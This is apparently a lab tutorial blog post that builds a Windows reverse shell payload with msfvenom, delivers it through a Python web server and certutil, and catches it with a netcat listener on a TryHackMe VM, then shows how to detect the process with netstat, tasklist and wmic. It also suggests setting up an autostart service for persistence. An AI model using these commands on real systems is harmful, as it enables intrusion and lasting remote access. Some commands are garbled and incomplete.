Simple Reverse Shell with msfvenom

Hi, folks. In this post I would like to show you a pretty simple way to create reverse shell with msfvenom using Kali Linux machine and Windows 7 host. We will run it, establish connection from victim host and I will show you a few hints how to detect the malicious process. Let’s start!

As a target machine, I will use TryHackMe vulnerable windowsprivescarena, available for free here. Attacker machine is a Kali Linux distribution hosted on VirtualBox under Windows OS.

1. Starts victim host and connects using remote desktop as administrator TCM:

The most important information is windows host is type of x64.

2. Now, it is time to create a malicious payload. On Kali VM, open terminal and check ip configuration. I am connected throw VPN, so, provide your internet interface name:

$ ip -f inet addr show tun0 

create executable with msfvenom tool, specifying target host as our Kali VM ip address and any port, ex. 8888:

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=8888 -a x64 --platform Windows -f exe -o NothingInteresting.exe

3. Now we have to delivery payload to target machine. Doing so, create a simple http server with Python3:

$ python3 -m http.server 80

4. Next, go to Windows 7 VM and download executable. I prefer using certutil tool, which is part of Windows installation:

PS> certutil -urlcache -f c:\Temp\NothingInteresting.exe

5. Back to Kali and run netcat listener on port 8888:

6. To make thing easy, I will just run executable from PowerShell.

To do more discreetly, try to create a Windows service in autostart mode, to be sure backdoor are always up and running after system restart.

Getting back to Kali netcat listener, we can find new connection established from target Windows 7 VM and our Kali box. This is exactly how reverse shell works! Now, we have a shell as administrator. Firewall unbale to prevent connection because of it was initiated by victim’s host.

So, nice, we have a shell. Now it is time to show you how to detect any connection established.

1. Open PowerShell or Command Prompt on Windows machine and type:

PS> netstat -naob | findstr ESTABLISHED

or use attribute -f:

PS> netstat -f

As you can see, there are two suspicious connections established with unknown host of I know, our executable is running on 8888, so let’s check it. We have got a PID of a process running on port 8888.

2. Use tasklist command to list all tasks (/m) filtered by PID (/fi):

PS> tasklist /m /fi 'PID eq 2460'

We found malicious executable running.

3. Let’s do last check and open cmd.exe. Using Windows Management Instrumentation Console (wmic), list a parent process which has executed malicious NothingInteresting.exe:

wmic process get name,parentprocessid,processid | find "2460" 

Now we can see that the file was launched from the commandline

Above we can see how to prepare a tcp reverse shell executable using msfvenom, establish reverse shell connection and ways to hunt the malicious process. We found a process running on suspicious port and its parent process ID.

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